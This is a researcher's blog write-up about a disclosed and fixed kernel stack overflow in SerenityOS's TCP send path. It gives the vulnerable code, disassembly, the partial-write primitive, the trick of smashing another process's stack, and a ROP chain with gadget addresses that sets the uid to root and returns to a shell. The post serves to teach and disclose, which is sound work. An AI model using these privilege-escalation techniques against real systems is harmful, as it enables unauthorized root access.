SerenityOS Logo

“Hello, Friends!”

Recently I have taken an interest in a project called SerenityOS. Stolen straight from the GitHub:

SerenityOS is a love letter to ’90s user interfaces with a custom Unix-like core. It flatters with sincerity by stealing beautiful ideas from various other systems.

Roughly speaking, the goal is a marriage between the aesthetic of late-1990s productivity software and the power-user accessibility of late-2000s *nix. This is a system by us, for us, based on the things we like.

It’s a surprisingly featured hobby operating system with quite a welcoming community behind it. It caught my radar after a series of videos by LiveOverflow and Andreas (the developer) detailing a few exploits made during the 2020 hxp CTF, so I decided to explore the system myself. Eventually, I found a memory corruption bug in some networking code that could be leveraged into kernel-mode code execution.

The Bug

The vulnerability can be hit so easily by some bad code that I’m surprised it wasn’t found by a fuzzer immediately. At its core, it’s a stack overflow in the function TCPSocket::send_tcp_packet. To see how, let’s take a look at the implementation.

KResult TCPSocket::send_tcp_packet(u16 flags, const UserOrKernelBuffer* payload, size_t payload_size)
{
    const size_t buffer_size = sizeof(TCPPacket) + payload_size;
    alignas(TCPPacket) u8 buffer[buffer_size];
    new (buffer) TCPPacket;
    auto& tcp_packet = *(TCPPacket*)(buffer);
    ASSERT(local_port());
    tcp_packet.set_source_port(local_port());
    tcp_packet.set_destination_port(peer_port());
    tcp_packet.set_window_size(1024);
    tcp_packet.set_sequence_number(m_sequence_number);
    tcp_packet.set_data_offset(sizeof(TCPPacket) / sizeof(u32));
    tcp_packet.set_flags(flags);
    //...
    if (payload && !payload->read(tcp_packet.payload(), payload_size))
        return EFAULT;
    //...
    if (tcp_packet.has_syn() || payload_size > 0) {
        //...
        send_outgoing_packets();
        return KSuccess;
    }
    //...
}

This function is called when attempting to use the send() syscall on a TCP socket (naturally). None of the parent callers in the chain (Process::sys$sendmsg, IPv4Socket::sendto, and TCPSocket::protocol_send) do any bounds checking on the user-provided payload_size other than ensuring the value is in userspace. Unfortunately, a value being in userspace is quite a lax requirement when then using the value to make a stack allocation. The problem line is:

alignas(TCPPacket) u8 buffer[buffer_size];

buffer is then a Variable-length Array (VLA) which is a really cursed feature from C99 that is as bad as it sounds. It attempts to dynamically resize the stack-frame using the value we provided, which can do some very unexpected things when the value is larger than the stack size (Serenity seems to use a stack size of 2^16 in the kernel). We can thus easily obliterate the stack and trigger a crash by calling something to the effect of:

send(tcp_socket, user_buffer, 0xdeadaa, 0); //BOOM!

This is all well and good, but can we actually do something useful with this? First and foremost, we need to make sure there’s no funny business going on with the allocation itself. Examining the code produced by gcc:

...
<+749>: test   eax,eax
<+751>: jg     0xc018a36f <Kernel::TCPSocket::send_tcp_packet(unsigned short, Kernel::UserOrKernelBuffer const*, unsigned long)+771>
<+753>: push   edx
<+754>: push   edx
<+755>: push   eax
<+756>: lea    eax,[ebx+0x1c3be4]
<+762>: push   eax
<+763>: call   0xc01e08e2 <__ubsan_handle_vla_bound_not_positive()>
<+768>: add    esp,0x10
<+771>: mov    eax,DWORD PTR [ebp-0x70]
<+774>: lea    esi,[ebp-0x58]
<+777>: add    eax,0xf
<+780>: and    eax,0xfffffff0
<+783>: sub    esp,eax
<+785>: lea    eax,[ebp-0x70]
...

Seems to do exactly as advertised, just a sub esp with our value (and with the shiny UB sanitizer attached). So now that we can be confident the allocation won’t mess with any memory, the next step is using it safely. Nearly right after the allocation, we have our userspace buffer being copied into the kernel buffer:

if (payload && !payload->read(tcp_packet.payload(), payload_size))
    return EFAULT;

This could be bad news for us if we provide a valid-sized user buffer because then we’d at the very least hit the guard page below the stack and fail. But that’s a big if. Providing a non-valid user buffer is totally fair game, too. How would the kernel know? What I mean by this is that our buffer isn’t as long as we say it is. The result is that as payload->read attempts to copy over our bytes, it’ll fault when it hits our bad memory. But this time, the fault will be on the user side, meaning the function will gracefully exit on the kernel’s end.

u8* stack_smash = (u8*)mmap(nullptr, ST_BUFFER_LEN, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
...
send(socket_fd, stack_smash, send_len, 0); //send_len is much, much larger than ST_BUFFER_LEN!

@patrickwardle has a nice visual of this regarding a similar idea on macOS:

macOS partial write

This is wonderful, as this chain of events means we have:

  • A sub esp with a user-controlled value
  • An arbitrary write with another user-controlled value/length
  • A graceful exit

I reported the issue and it was fixed within 15 minutes. This guy is a beast!

Now we have all the tools necessary to exploit this :)

Exploitation

We have essentially what is an arbitrary write primitive, so first we must choose what we want to write to. We have to keep in mind that we are writing from an offset from the stack, though, which might make things a little unpredictable. Thankfully, there is little to no KASLR on the system (as far as I’ve seen) but general system noise and randomness make specific writes fairly difficult. That makes directly writing to a critical structure out of the question, but what about staying in the realm of the stack? As the bug is a stack overflow we can’t write to anything already on our stack (as it continues to grow downwards), but I did notice the offsets between stacks seems to remain constant:

...
[#0 SystemServer(5:5)]: Created kernel stack: 0xc35df000
[#0 SystemServer(5:5)]: Created kernel stack: 0xc35f0000
[#0 SystemServer(5:5)]: Created kernel stack: 0xc3601000
[#0 SystemServer(5:5)]: Created kernel stack: 0xc3612000
...

The offset is 0x11000, which is just the stack size 0x10000 plus the guard page size 0x1000. And so, if we can’t write to our own stack… we can still write to another process stack fairly reliably. It then just becomes a case of winning a race condition between what the other process is doing and the write that we do. This is not a problem however as we control the ‘victim’ process, so we can just make it do something as trivial as call sleep, giving us an arbitrary race window. There is also one final annoyance of some randomization that is done whenever we call a syscall:

// Apply a random offset in the range 0-255 to the stack pointer,
// to make kernel stacks a bit less deterministic.
// Since this is very hot code, request random data in chunks instead of
// one byte at a time. This is a noticeable speedup.
if (g_random_byte_buffer_offset == RandomByteBufferSize) {
    get_fast_random_bytes(g_random_byte_buffer, RandomByteBufferSize);
    g_random_byte_buffer_offset = 0;
}

This slight randomization to the stack bases makes writing to an exact address of the victim’s stack unreliable (granted, it could be brute-forced in a millisecond). But once again the stars align as the sleep syscall does not care very much about how the stack is laid out as it returns. During its call, it eventually reaches the function Processor::switch_context, which is the final stage before swapping contexts. In it, it does:

...
<+159>: pushf  
<+160>: push   ebx
<+161>: push   esi
<+162>: push   edi
<+163>: push   ebp
...
<+186>: push   eax
<+187>: push   edx
<+188>: push   ecx
<+189>: cld    
<+190>: jmp    0xc011b7d4 <enter_thread_context()>
<+195>: pop    edx
<+196>: pop    eax
<+197>: pop    ebp
<+198>: pop    edi
<+199>: pop    esi
<+200>: pop    ebx
<+201>: popf   
...
<+225>: lea    esp,[ebp-0xc]
<+228>: pop    ebx
<+229>: pop    esi
<+230>: pop    edi
<+231>: pop    ebp
<+232>: ret    
...

Pretty much saving the state and restoring it afterwards. Crucially, it loads esp with a value on the stack, then returns shortly after. Accuracy doesn’t matter here, we can just spray the stack with a new stack pointer and have it return from there… code execution! At this point, we just need to put a ROP chain in some kernel memory and have the stack be redirected to there. I chose to just spray some heap memory with the ROP, but this part was extremely iffy. The offset between the current stack and the heap is not something I could reasonably predict so I had to pretty much blast the entire heap with the code. I used something like a nop sled but with a bunch of rets instead (a ret sled?) to make the ROP chain execution reliable but it would still crash half the time if the offset was too large and I wrote to some bad memory. There’s probably a better way to store the ROP but for my purposes, it will suffice.

The ROP chain I ended up with was very similar to the one in vakzz’s awesome exploit chain, writing root to our processes permission bits.

write_u32(heap_smash, &off, 0xc0157c1e); //pop eax; ret;
write_u32(heap_smash, &off, 0xc0811000); //heap

write_u32(heap_smash, &off, 0xc011ccdc); //pop edx; ret;
write_u32(heap_smash, &off, 0xc02289ef); //Kernell::process::current()

write_u32(heap_smash, &off, 0xc019092e); //mov dw [eax], edx; ret;

pad(heap_smash, &off, 0x41414141);       //stack padding

write_u32(heap_smash, &off, 0xc0157cec); //pop edi; pop ebp; ret;
write_u32(heap_smash, &off, 0xc0811018); //heap+0x18 
write_u32(heap_smash, &off, 0x00000000); //dummy 

write_u32(heap_smash, &off, 0xc0195672); //call dw [edi - 0x18]; ret;

write_u32(heap_smash, &off, 0xc011ccdc); //pop edx; ret;
write_u32(heap_smash, &off, 0x00000038); //uid offset

write_u32(heap_smash, &off, 0xc018f828); //add eax, edx; ret;

pad(heap_smash, &off, 0x42424242);       //stack padding

write_u32(heap_smash, &off, 0xc011ccdc); //pop edx; ret
write_u32(heap_smash, &off, 0x00000000); //root

write_u32(heap_smash, &off, 0xc019092e); //mov dw [eax], edx; ret

pad(heap_smash, &off, 0x43434343);       //stack padding

write_u32(heap_smash, &off, 0xc012476c); //cli; ret;
write_u32(heap_smash, &off, 0xc02611c8); //pop ds; cmc; dec ecx; ret;
write_u32(heap_smash, &off, ds);
write_u32(heap_smash, &off, 0xc013080f); //iretd; ret;
write_u32(heap_smash, &off, (u32)&shell);
write_u32(heap_smash, &off, cs);
write_u32(heap_smash, &off, flags);
write_u32(heap_smash, &off, (u32)(user_stack + 50*PAGE_SIZE));
write_u32(heap_smash, &off, ss);

The final step was just compiling all this into a working exploit. To summarize,

  • There is a stack overflow in TCPSocket::send_tcp_packet that gives an arbitrary write from an offset off the stack
  • We can reliably write to a stack below ours, for example a stack owned by a child process
  • Calling sleep gives ample time to smash its stack and have it use our own stack pointer and thus return pointer
  • ROP our way to victory

My final-ish exploit code can be found here.

Conclusion

Tinkering around with both the SerenityOS kernel and its JS engine have been a blast and I hope to return to them in the future, especially when the JS engine is more fleshed out. I’d also like to thank Andreas for answering my questions about his system very patiently :P Hope you enjoyed this little blurb about making a kernel exploit.